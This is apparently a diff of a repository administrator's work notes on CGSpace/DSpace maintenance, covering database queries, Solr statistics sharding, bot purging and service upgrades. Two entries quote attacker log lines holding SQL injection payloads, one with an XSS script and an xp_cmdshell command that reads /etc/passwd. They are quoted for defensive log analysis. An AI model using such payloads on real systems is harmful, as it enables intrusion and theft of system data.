    +
  • +
+
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
+                                           text_value                                           │           dspace_object_id           
+────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
+ Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
+(1 row)
+
+Time: 739.948 ms
+
    +
  • Now this script runs in four minutes (versus twenty-four!) and it still finds the same seven duplicates! Amazing!
  • +
  • I still don’t understand the differences in the query plan well enough, but I see it is using the DSpace default indexes and the results are accurate
  • +
  • So to summarize, the best to the worst query, all returning the same result:
  • +
+
localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
+localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
+                                           text_value                                           │           dspace_object_id           
+────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
+ Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
+(1 row)
+
+Time: 683.165 ms
+Time: 635.364 ms
+Time: 674.666 ms
+
+localhost/dspace= > DISCARD ALL;
+localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
+localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
+                                           text_value                                           │           dspace_object_id           
+────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
+ Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
+(1 row)
+
+Time: 1584.765 ms (00:01.585)
+Time: 1665.594 ms (00:01.666)
+Time: 1623.726 ms (00:01.624)
+
+localhost/dspace= > DISCARD ALL;
+localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
+                                           text_value                                           │           dspace_object_id           
+────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
+ Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
+(1 row)
+
+Time: 4028.939 ms (00:04.029)
+Time: 4022.239 ms (00:04.022)
+Time: 4061.820 ms (00:04.062)
+
+localhost/dspace= > DISCARD ALL;
+localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
+                                           text_value                                           │           dspace_object_id           
+────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
+ Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
+(1 row)
+
+Time: 4358.713 ms (00:04.359)
+Time: 4301.248 ms (00:04.301)
+Time: 4417.909 ms (00:04.418)
+
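  • As a footnote to the GIN/GiST experiment above, a trigram GIN index on metadatavalue looks something like this (a minimal sketch, assuming the pg_trgm extension is already enabled; not necessarily the exact index I tested):
  • +
+
localhost/dspace= > CREATE INDEX metadatavalue_text_value_trgm_gin_idx ON metadatavalue USING gin (text_value gin_trgm_ops);
+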

2021-10-13

+ +

2021-10-14

+
    +
  • Someone in the DSpace community already posted a fix for the DSpace 6/7 duplicate items export bug! + +
  • +
  • Altmetric support got back to us about the missing DOI–Handle link and said it was due to the TLS certificate chain on CGSpace +
      +
    • I checked and everything is actually working fine (a quick check is sketched at the end of this section), so it could be that their backend servers are old and don’t support the new Let’s Encrypt trust path
    • +
    • I asked them to put me in touch with their backend developers directly
    • +
    +
  • +
+
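  • The quick check mentioned above is something along these lines (a sketch of the kind of command, not a record of exactly what I ran):
  • +
+
$ echo | openssl s_client -connect cgspace.cgiar.org:443 -servername cgspace.cgiar.org 2>/dev/null | openssl x509 -noout -issuer -dates
+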

2021-10-17

+
    +
  • Revert the ssl-cert change on the Ansible infrastructure scripts so that nginx uses a manually generated “snakeoil” TLS certificate +
      +
    • The ssl-cert one is easier because it’s automatic, but they include the hostname in the bogus cert so it’s an unnecessary leak of information
    • +
    +
  • +
  • I started doing some tests to upgrade Elasticsearch from 7.6.2 to 7.7, 7.8, 7.9, and eventually 7.10 on OpenRXV +
      +
    • I tested harvesting, reporting, filtering, and various admin actions with each version and they all worked fine, with no errors in any logs as far as I can see
    • +
    • This fixes a bunch of issues, updates Java from 13 to 15, and moves the base image from CentOS 7 to 8, so it pays down a decent amount of technical debt!
    • +
    • I even tried Elasticsearch 7.13.2, which has Java 16, and it works fine…
    • +
    • I submitted a pull request: https://github.com/ilri/OpenRXV/pull/126
    • +
    +
  • +
+

2021-10-20

+
    +
  • Meeting with Big Data and CGIAR repository players about the feasibility of moving to a single repository +
      +
    • We discussed several options, for example moving all DSpaces to CGSpace along with their permanent identifiers
    • +
    • The issue would be for centers like IFPRI, who don’t use DSpace and have integrations between their current repository and their website, etc.
    • +
    +
  • +
+

2021-10-21

+
    +
  • Udana from IWMI contacted me to ask if I could do a one-off AReS harvest because they have some new items they need to report on
  • +
+

2021-10-22

+
    +
  • Abenet and others contacted me to say that the LDAP login was not working on CGSpace +
      +
    • I checked with ldapsearch and it is indeed not working:
    • +
    +
  • +
+
$ ldapsearch -x -H ldaps://AZCGNEROOT3.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "booo" -W "(sAMAccountName=fuuu)"
+Enter LDAP Password:
+ldap_bind: Invalid credentials (49)
+        additional info: 80090308: LdapErr: DSID-0C090447, comment: AcceptSecurityContext error, data 52e, v3839
+
    +
  • I sent a message to ILRI ICT to ask them to check the account +
      +
    • They reset the password so I ran all system updates and rebooted the server since users weren’t able to log in anyways
    • +
    +
  • +
+

2021-10-24

+
    +
  • CIP was asking about CGSpace stats again +
      +
    • The last time I helped them with this was in 2021-04, when I extracted stats for their community from the DSpace Statistics API
    • +
    +
  • +
  • In looking at the CIP stats request I got curious if there were any hits from all those Russian IPs before 2021-07 that I could purge +
      +
    • Sure enough there were a few hundred IPs belonging to those ASNs:
    • +
    +
  • +
+
$ http 'localhost:8081/solr/statistics/select?q=time%3A2021-04*&fl=ip&wt=json&indent=true&facet=true&facet.field=ip&facet.limit=200000&facet.mincount=1' > /tmp/2021-04-ips.json
+# Ghetto way to extract the IPs using jq, but I can't figure out how to only print them and not the facet counts, so I just use sed
+$ jq '.facet_counts.facet_fields.ip[]' /tmp/2021-04-ips.json | grep -E '^"' | sed -e 's/"//g' > /tmp/ips.txt
+$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-04-ips.csv
+$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/2021-04-ips.csv | csvcut -c network | sed 1d | sort -u > /tmp/networks-to-block.txt
+$ wc -l /tmp/networks-to-block.txt 
+125 /tmp/networks-to-block.txt
+$ grepcidr -f /tmp/networks-to-block.txt /tmp/ips.txt > /tmp/ips-to-purge.txt
+$ wc -l /tmp/ips-to-purge.txt
+202
+
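  • As an aside, jq’s strings filter selects only the string values from that facet array, so the grep/sed dance above could probably be avoided (untested sketch):
  • +
+
$ jq -r '.facet_counts.facet_fields.ip[] | strings' /tmp/2021-04-ips.json > /tmp/ips.txt
+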
    +
  • Attempting to purge those only shows about 3,500 hits, but I will do it anyways +
      +
    • Adding 64.39.108.48 from Qualys I get a total of 22631 hits purged
    • +
    +
  • +
  • I also purged another 5306 hits after checking the IPv4 list from AbuseIPDB.com
  • +
+

2021-10-25

+
    +
  • Help CIP colleagues with view and download statistics for their community in 2020 and 2021
  • +
+

2021-10-27

+
    +
  • Help ICARDA colleagues with GLDC reports on AReS +
      +
    • There was an issue due to differences in CRP metadata between repositories
    • +
    +
  • +
+

2021-10-28

+
    +
  • Meeting with Medha and a bunch of others about the FAIRscribe tool they have been developing +
      +
    • Seems it is a submission tool like MEL
    • +
    +
  • +
+

2021-10-29

+
    +
  • Linode alerted me that CGSpace (linode18) has high outbound traffic for the last two hours +
      +
    • This has happened a few other times this week so I decided to go look at the Solr stats for today
    • +
    • I see 93.158.91.62 is making thousands of requests to Discover with a normal user agent:
    • +
    +
  • +
+
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
+
    +
  • Even more annoying, they are not re-using their session ID:
  • +
+
$ grep 93.158.91.62 log/dspace.log.2021-10-29 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+4888
+
    +
  • This IP has made 36,000 requests to CGSpace…
  • +
  • The IP is owned by Internet Vikings in Sweden
  • +
  • I purged their statistics and set up a temporary HTTP 403 telling them to use a real user agent
  • +
  • I see another one in Sweden a few days ago (192.36.109.131), also using the same exact user agent as above, but belonging to Resilans AB +
      +
    • I purged another 74,619 hits from this bot
    • +
    +
  • +
  • I added these two IPs to the nginx IP bot identifier
  • +
  • Jesus, I found a few Russian IPs attempting SQL injection and path traversal, for example:
  • +
+
45.9.20.71 - - [20/Oct/2021:02:31:15 +0200] "GET /bitstream/handle/10568/1820/Rhodesgrass.pdf?sequence=4&OoxD=6591%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 143070 "https://cgspace.cgiar.org:443/bitstream/handle/10568/1820/Rhodesgrass.pdf" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11"
+
    +
  • I reported them to AbuseIPDB.com and purged their hits:
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ip.txt -p
+Purging 6364 hits from 45.9.20.71 in statistics
+Purging 8039 hits from 45.146.166.157 in statistics
+Purging 3383 hits from 45.155.204.82 in statistics
+
+Total number of bot hits purged: 17786
+

2021-10-31

+
    +
  • Update Docker containers for AReS on linode20 and run a fresh harvest
  • +
  • Found some strange IP (94.71.3.44) making 51,000 requests today with the user agent “Microsoft Internet Explorer” +
      +
    • It is in Greece, and it seems to be requesting each item’s XMLUI full metadata view, so I suspect it’s Gardian actually
    • +
    • I found it making another 25,000 requests yesterday…
    • +
    • I purged them from Solr
    • +
    +
  • +
  • Found 20,000 hits from Qualys (according to AbuseIPDB.com) using normal user agents… ugh, must be some ILRI ICT scan
  • +
  • Found more requests from a Swedish IP (93.158.90.34) using that weird Firefox user agent that I noticed a few weeks ago:
  • +
+
Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0
+
    +
  • That’s from ASN 12552 (IPO-EU, SE), which is operated by Internet Vikings, though AbuseIPDB.com says it’s Availo Networks AB
  • +
  • There’s another IP (3.225.28.105) that made a few thousand requests to the REST API from Amazon, though it’s using a normal user agent
  • +
+
# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | wc -l
+3991
+~# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | grep -oE 'GET /rest/(collections|handle|items)' | sort | uniq -c
+   3154 GET /rest/collections
+    427 GET /rest/handle
+    410 GET /rest/items
+
    +
  • It requested the CIAT Story Maps collection over 3,000 times last month… +
      +
    • I will purge those hits
    • +
    +
  • +
+ + + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2021-11/index.html b/docs/2021-11/index.html new file mode 100644 index 000000000..9963d3e28 --- /dev/null +++ b/docs/2021-11/index.html @@ -0,0 +1,548 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + November, 2021 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

November, 2021

+ +
+

2021-11-02

+
    +
  • I experimented with manually sharding the Solr statistics on DSpace Test
  • +
  • First I exported all the 2019 stats from CGSpace:
  • +
+
$ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
+$ zstd statistics-2019.json
+
+
$ mkdir -p /home/dspacetest.cgiar.org/solr/statistics-2019/data
+# create core in Solr admin
+$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2019-*</query></delete>"
+$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
+
    +
  • The key thing above is that you create the core in the Solr admin UI, but the data directory must already exist, so you have to create it on the file system first (a command-line alternative is sketched below)
  • +
  • I restarted the server after the import was done to see if the cores would come back up OK +
      +
    • I remember last time I tried this the manually created statistics cores didn’t come back up after I rebooted, but this time they did
    • +
    +
  • +
+
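  • The core creation could probably also be done from the command line with Solr’s CoreAdmin API instead of the admin UI, something like this (an untested sketch; the instanceDir and dataDir values are assumptions based on the paths above):
  • +
+
$ curl -s 'http://localhost:8081/solr/admin/cores?action=CREATE&name=statistics-2019&instanceDir=statistics&dataDir=/home/dspacetest.cgiar.org/solr/statistics-2019/data'
+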

2021-11-03

+
    +
  • While inspecting the stats for the new statistics-2019 shard on DSpace Test I noticed that I can’t find any stats via the DSpace Statistics API for an item that should have some +
      +
    • I checked on CGSpace’s and I can’t find them there either, but I see them in Solr when I query in the admin UI
    • +
    • I need to debug that, but it doesn’t seem to be related to the sharding…
    • +
    +
  • +
+

2021-11-04

+
    +
  • I spent a little bit of time debugging the Solr bug with the statistics-2019 shard but couldn’t reproduce it for the few items I tested +
      +
    • So that’s good, it seems the sharding worked
    • +
    +
  • +
  • Linode alerted me to high CPU usage on CGSpace (linode18) yesterday +
      +
    • Looking at the Solr hits from yesterday I see 91.213.50.11 making 2,300 requests
    • +
    • According to AbuseIPDB.com this is owned by Registrarus LLC (registrarus.ru) and it has been reported for malicious activity by several users
    • +
    • The ASN is 50340 (SELECTEL-MSK, RU)
    • +
    • They are attempting SQL injection:
    • +
    +
  • +
+
91.213.50.11 - - [03/Nov/2021:06:47:20 +0100] "HEAD /bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf?sequence=1%60%20WHERE%206158%3D6158%20AND%204894%3D4741--%20kIlq&isAllowed=y HTTP/1.1" 200 0 "https://cgspace.cgiar.org:443/bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf" "Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10"
+
    +
  • Another is in China, and they grabbed 1,200 PDFs from the REST API in under an hour:
  • +
+
# zgrep 222.129.53.160 /var/log/nginx/rest.log.2.gz | wc -l
+1178
+
    +
  • I will continue to split the Solr statistics back into year-shards on DSpace Test (linode26) +
      +
    • Today I did all 2018 stats…
    • +
    • I want to see if there is a noticeable change in JVM memory, Solr response time, etc
    • +
    +
  • +
+

2021-11-07

+
    +
  • Update all Docker containers on AReS and rebuild OpenRXV:
  • +
+
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
+$ docker-compose build
+
    +
  • Then restart the server and start a fresh harvest
  • +
  • Continue splitting the Solr statistics into yearly shards on DSpace Test (doing 2017, 2016, 2015, and 2014 today)
  • +
  • Several users wrote to me last week to say that workflow emails haven’t been working since 2021-10-21 or so +
      +
    • I did a test on CGSpace and it’s indeed broken:
    • +
    +
  • +
+
$ dspace test-email
+
+About to send test email:
+ - To: fuuuu
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 535 5.7.139 Authentication unsuccessful, the user credentials were incorrect. [AM5PR0701CA0005.eurprd07.prod.outlook.com]
+)
+
+Please see the DSpace documentation for assistance.
+
    +
  • I sent a message to ILRI ICT to ask them to check the account/password
  • +
  • I want to do one last test of the Elasticsearch updates on OpenRXV so I got a snapshot of the latest Elasticsearch volume used on the production AReS instance:
  • +
+
# tar czf openrxv_esData_7.tar.xz /var/lib/docker/volumes/openrxv_esData_7
+
    +
  • Then on my local server:
  • +
+
$ mv ~/.local/share/containers/storage/volumes/openrxv_esData_7/ ~/.local/share/containers/storage/volumes/openrxv_esData_7.2021-11-07.bak
+$ tar xf /tmp/openrxv_esData_7.tar.xz -C ~/.local/share/containers/storage/volumes --strip-components=4
+$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type f -exec chmod 660 {} \;
+$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type d -exec chmod 770 {} \;
+# copy backend/data to /tmp for the repository setup/layout
+$ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/data
+
    +
  • This seems to work: all items, stats, and repository setup/layout are OK
  • +
  • I merged my Elasticsearch pull request from last month into OpenRXV
  • +
+

2021-11-08

+
    +
  • File an issue for the Angular flash of unstyled content on DSpace 7
  • +
  • Help Udana from IWMI with a question about CGSpace statistics +
      +
    • He found conflicting numbers when using the community and collection modes in Content and Usage Analysis
    • +
    • I sent him more numbers directly from the DSpace Statistics API
    • +
    +
  • +
+

2021-11-09

+
    +
  • I migrated the 2013, 2012, and 2011 statistics to yearly shards on DSpace Test’s Solr to continue my testing of memory / latency impact
  • +
  • I found out why the CI jobs for the DSpace Statistics API had been failing the past few weeks +
      +
    • When I reverted to using the original falcon-swagger-ui project after they apparently merged my Falcon 3 changes, it seems that they actually only merged the Swagger UI changes, not the Falcon 3 fix!
    • +
    • I switched back to using my own fork and now it’s working
    • +
    • Unfortunately now I’m getting an error installing my dependencies with Poetry:
    • +
    +
  • +
+
RuntimeError
+
+Unable to find installation candidates for regex (2021.11.9)
+
+at /usr/lib/python3.9/site-packages/poetry/installation/chooser.py:72 in choose_for
+     68│
+     69│             links.append(link)
+     70│
+     71│         if not links:
+  →  72│             raise RuntimeError(
+     73│                 "Unable to find installation candidates for {}".format(package)
+     74│             )
+     75│
+     76│         # Get the best link
+
    +
  • So that’s super annoying… I’m going to try using Pipenv again…
  • +
+

2021-11-10

+
    +
  • 93.158.91.62 is scraping us again +
      +
    • That’s an IP in Sweden that is clearly a bot, but pretending to use a normal user agent
    • +
    • I added them to the “bot” list in nginx so the requests will share a common DSpace session with other bots and not create Solr hits, but still they are causing high outbound traffic
    • +
    • I modified the nginx configuration to send them an HTTP 403 and tell them to use a bot user agent (roughly as sketched below)
    • +
    +
  • +
+
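  • Roughly, that kind of nginx rule has this shape (a simplified, hypothetical sketch; the real configuration lives in the Ansible infrastructure scripts and may look different):
  • +
+
# http context: flag known abusive IPs by address
+geo $bad_bot_ip {
+    default        0;
+    93.158.91.62   1;
+}
+# server context: refuse them with a hint about user agents
+if ($bad_bot_ip) {
+    return 403 "Please use a user agent that identifies your bot";
+}
+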

2021-11-14

+
    +
  • I decided to update AReS to the latest OpenRXV version with Elasticsearch 7.13 +
      +
    • First I took backups of the Elasticsearch volume and OpenRXV backend data:
    • +
    +
  • +
+
$ docker-compose down
+$ sudo tar czf openrxv_esData_7-2021-11-14.tar.xz /var/lib/docker/volumes/openrxv_esData_7
+$ cp -a backend/data backend/data.2021-11-14
+
    +
  • Then I checked out the latest git commit, updated all images, rebuilt the project:
  • +
+
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
+$ docker-compose build
+$ docker-compose up -d
+
    +
  • Then I updated the repository configurations and started a fresh harvest
  • +
  • Help Francesca from the Alliance with a question about embargos on CGSpace items +
      +
    • I logged in as a normal user and a CGIAR user, and I was unable to access the PDF or full text of the item
    • +
    • I was only able to access the PDF when I was logged in as an admin
    • +
    +
  • +
+

2021-11-21

+
    +
  • Update all Docker images on AReS (linode20) and re-build OpenRXV +
      +
    • Run all system updates and reboot the server
    • +
    • Start a full harvest, but I noticed that the number of items being harvested was not complete, so I stopped it
    • +
    +
  • +
  • Run all system updates on CGSpace (linode18) and DSpace Test (linode26) and reboot them
  • +
  • ICT finally got back to us about the passwords for SMTP, so I updated that and tested it to make sure it’s working
  • +
  • Some bot with IP 87.203.87.141 in Greece is making tons of requests to XMLUI with the user agent Microsoft Internet Explorer +
      +
    • I added them to the list of IPs in nginx that get an HTTP 403 with a message to use a real user agent
    • +
    • I will also purge all their requests from Solr:
    • +
    +
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
+Purging 10893 hits from 87.203.87.141 in statistics
+
+Total number of bot hits purged: 10893
+
    +
  • I did a bit more work documenting and tweaking the PostgreSQL configuration for CGSpace and DSpace Test in the Ansible infrastructure playbooks +
      +
    • I finally deployed the changes on both servers
    • +
    +
  • +
+

2021-11-22

+
    +
  • Udana asked me about validating on OpenArchives again +
      +
    • According to my notes we actually completed this in 2021-08, but for some reason we are no longer on the list and I can’t validate again
    • +
    • There seems to be a problem with their website because every link I try to validate says it received an HTTP 500 response from CGSpace
    • +
    +
  • +
+

2021-11-23

+
    +
  • Help RTB colleagues with thumbnail issues on their 2020 Annual Report +
      +
    • The PDF seems to be in landscape mode or something and the first page is half width, so the thumbnail renders with the left half being white
    • +
    • I generated a new one manually with libvips and it is better:
    • +
    +
  • +
+
$ vipsthumbnail AR\ RTB\ 2020.pdf -s 600 -o '%s.jpg[Q=85,optimize_coding,strip]'
+
    +
  • I sent an email to the OpenArchives.org contact to ask for help with the OAI validator +
      +
    • Someone responded to say that there have been a number of complaints about this on the oai-pmh mailing list recently…
    • +
    +
  • +
  • I sent an email to Pythagoras from GARDIAN to ask if they can use a more specific user agent than “Microsoft Internet Explorer” for their scraper +
      +
    • He said he will change the user agent
    • +
    +
  • +
+

2021-11-24

+
    +
  • I had an idea to check our Solr statistics for hits from all the IPs that I have listed in nginx as being bots +
      +
    • Other than a few that I ruled out that may be humans, these are all making requests within one month or with no user agent, which is highly suspicious:
    • +
    +
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt
+Found 8352 hits from 138.201.49.199 in statistics
+Found 9374 hits from 78.46.89.18 in statistics
+Found 2112 hits from 93.179.69.74 in statistics
+Found 1 hits from 31.6.77.23 in statistics
+Found 5 hits from 34.209.213.122 in statistics
+Found 86772 hits from 163.172.68.99 in statistics
+Found 77 hits from 163.172.70.248 in statistics
+Found 15842 hits from 163.172.71.24 in statistics
+Found 172954 hits from 104.154.216.0 in statistics
+Found 3 hits from 188.134.31.88 in statistics
+
+Total number of hits from bots: 295492
+
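  • To spot-check the “no user agent” part for one of those IPs, a Solr query like this should work (a sketch; userAgent is the field name in the DSpace statistics schema, and the IP is just the first one from the list above):
  • +
+
$ curl -s 'localhost:8081/solr/statistics/select?q=ip:138.201.49.199+AND+-userAgent:[*+TO+*]&rows=0&wt=json'
+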

2021-11-27

+
    +
  • Peter sent me corrections for the authors that I had sent him back in 2021-09 +
      +
    • I did a quick sanity check on them with OpenRefine, filtering out all the metadata with no replacements, then ran them through my csv-metadata-quality script
    • +
    • Then I imported them into my local instance as a test:
    • +
    +
  • +
+
$ ./ilri/fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
+
    +
  • Then I imported to CGSpace and started a full Discovery re-index:
  • +
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    272m43.818s
+user    183m4.543s
+sys     2m47.988
+

2021-11-28

+
    +
  • Run system updates on AReS server (linode20) and update all Docker containers and reboot +
      +
    • Then I started a fresh harvest as I always do on Sunday
    • +
    +
  • +
  • I am experimenting with pinning npm version 7 on OpenRXV frontend because of these Angular errors:
  • +
+
npm WARN EBADENGINE Unsupported engine {
+npm WARN EBADENGINE   package: '@angular-devkit/architect@0.901.15',
+npm WARN EBADENGINE   required: { node: '>= 10.13.0', npm: '^6.11.0 || ^7.5.6', yarn: '>= 1.13.0' },
+npm WARN EBADENGINE   current: { node: 'v12.22.7', npm: '8.1.3' }
+npm WARN EBADENGINE }
+
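  • The pinning itself would just be installing npm 7 explicitly before the frontend’s npm install step, roughly (a sketch; where exactly this goes in the frontend build is the part I’m still experimenting with):
  • +
+
$ npm install -g npm@7
+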

2021-11-29

+
    +
  • Tezira reached out to me to say that submissions on CGSpace are taking forever
  • +
  • I see a definite increase in locks in the last few days:
  • +
+

PostgreSQL locks week

+
    +
  • The locks are all held by dspaceWeb (XMLUI):
  • +
+
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
+      1 
+      1 ------------------
+      1 (1394 rows)
+      1  application_name 
+      9  psql
+   1385  dspaceWeb
+
    +
  • I restarted PostgreSQL and the locks dropped down:
  • +
+
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
+      1
+      1 ------------------
+      1 (103 rows)
+      1  application_name
+      9  psql
+     94  dspaceWeb
+

2021-11-30

+
    +
  • IWMI sent me ORCID identifiers for some new staff +
      +
    • We currently have 1332 unique identifiers, so this adds sixteen new ones:
    • +
    +
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-11-30-combined-orcids.txt
+$ wc -l /tmp/2021-11-30-combined-orcids.txt
+1348 /tmp/2021-11-30-combined-orcids.txt
+
    +
  • After I combined them and removed duplicates, I resolved all the names using my resolve-orcids.py script:
  • +
+
$ ./ilri/resolve-orcids.py -i /tmp/2021-11-30-combined-orcids.txt -o /tmp/2021-11-30-combined-orcids-names.txt
+
    +
  • Then I updated some ORCID identifiers that had changed in the XML:
  • +
+
$ cat 2021-11-30-fix-orcids.csv
+cg.creator.identifier,correct
+"ADEBOWALE AKANDE: 0000-0002-6521-3272","ADEBOWALE AD AKANDE: 0000-0002-6521-3272"
+"Daniel Ortiz Gonzalo: 0000-0002-5517-1785","Daniel Ortiz-Gonzalo: 0000-0002-5517-1785"
+"FRIDAY ANETOR: 0000-0003-3137-1958","Friday Osemenshan Anetor: 0000-0003-3137-1958"
+"Sander Muilerman: 0000-0001-9103-3294","Sander Muilerman-Rodrigo: 0000-0001-9103-3294"
+$ ./ilri/fix-metadata-values.py -i 2021-11-30-fix-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.identifier -t 'correct' -m 247
+
    +
  • Tag existing items from IWMI’s new authors with ORCID iDs using add-orcid-identifiers-csv.py (7 new metadata fields added):
  • +
+
$ cat 2021-11-30-add-orcids.csv 
+dc.contributor.author,cg.creator.identifier
+"Liaqat, U.W.","Umar Waqas Liaqat: 0000-0001-9027-5232"
+"Liaqat, Umar Waqas","Umar Waqas Liaqat: 0000-0001-9027-5232"
+"Munyaradzi, M.","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
+"Mutenje, Munyaradzi","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
+"Rex, William","William Rex: 0000-0003-4979-5257"
+"Shrestha, Shisher","Nirman Shrestha: 0000-0002-0996-8611"
+$ ./ilri/add-orcid-identifiers-csv.py -i 2021-11-30-add-orcids.csv -db dspace -u dspace -p 'fuuu'
+
+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2021-12/index.html b/docs/2021-12/index.html new file mode 100644 index 000000000..d9da2f183 --- /dev/null +++ b/docs/2021-12/index.html @@ -0,0 +1,631 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + December, 2021 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

December, 2021

+ +
+

2021-12-01

+
    +
  • Atmire merged some changes I had submitted to the COUNTER-Robots project
  • +
  • I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
  • +
+
$ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
+Purging 1989 hits from The Knowledge AI in statistics
+Purging 1235 hits from MaCoCu in statistics
+Purging 455 hits from WhatsApp in statistics
+
+Total number of bot hits purged: 3679
+

2021-12-02

+
    +
  • Francesca from Alliance asked me for help with approving a submission that gets stuck +
      +
    • I looked at the PostgreSQL activity and the locks are back up like they were earlier this week
    • +
    +
  • +
+
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
+      1 
+      1 ------------------
+      1 (1437 rows)
+      1  application_name 
+      9  psql
+   1428  dspaceWeb
+
    +
  • Munin shows the same:
  • +
+

PostgreSQL locks week

+
    +
  • Last month I enabled the log_lock_waits setting in PostgreSQL, so I checked the log and was surprised to find only a few lock waits since I restarted PostgreSQL three days ago:
  • +
+
# grep -E '^2021-(11-29|11-30|12-01|12-02)' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
+15
+
    +
